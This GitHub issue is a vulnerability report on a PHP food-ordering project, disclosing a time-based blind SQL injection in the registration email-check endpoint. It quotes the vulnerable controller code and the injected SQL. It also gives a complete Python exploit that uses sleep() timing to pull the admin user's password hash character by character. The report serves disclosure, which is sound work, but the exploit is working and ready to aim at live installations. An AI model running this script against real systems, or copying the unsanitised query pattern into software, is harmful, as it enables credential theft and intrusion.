Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

A Time-based blind SQL Injection in email check #11

Open
StefanoWen opened this issue Jan 17, 2019 · 0 comments
Open

A Time-based blind SQL Injection in email check #11

StefanoWen opened this issue Jan 17, 2019 · 0 comments

Comments

@StefanoWen
Copy link

When registering a new account, it will verify that the email address is being used.

web/Lib/Action/PublicAction.class.php

	//邮箱重复验证
	Public function checkemail(){
		$Member=M('Members');
		$data['useremail']=$_POST["param"];
		$reuseremail=$Member->where($data)->select();
		if(empty($reuseremail)) {
		 echo '{
		    
			"info":"",
			"status":"y"
		 }'; 
		}
		else{
		    echo '{
			"info":"该邮箱已注册,请更换其他邮箱!",
			"status":"n"
		 }'; 
		}
	}

We can bypass the SQL filter using this payload:

The final SQL statement would be

SELECT * FROM `sn_members` WHERE (  (`useremail` and sleep(5))  ) 

And here is the exp to obtain admin's password hash:

#!/usr/bin/env python
# -*- coding: utf-8 -*-


import requests
from string import ascii_letters, digits
from time import time

url = "http://127.0.0.1/waimai/index.php?m=public&a=checkemail"

cnt = 0
userpass = ''
for i in xrange(99):
    for j in ascii_letters + digits:

        data = {"param[0]": "exp",
                "param[1]": "and if ((select userpass from sn_members \
                            where username=0x61646d696e and userpass like BINARY '{}%'),sleep(2),1)"
                            .format(userpass + j),
                "name": "useremail"}

        start_time = time()
        r = requests.post(url=url, data=data)
        if time() - start_time > 2:
            userpass = userpass + j
            print userpass
            cnt += 1
    if cnt == i:
        break
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant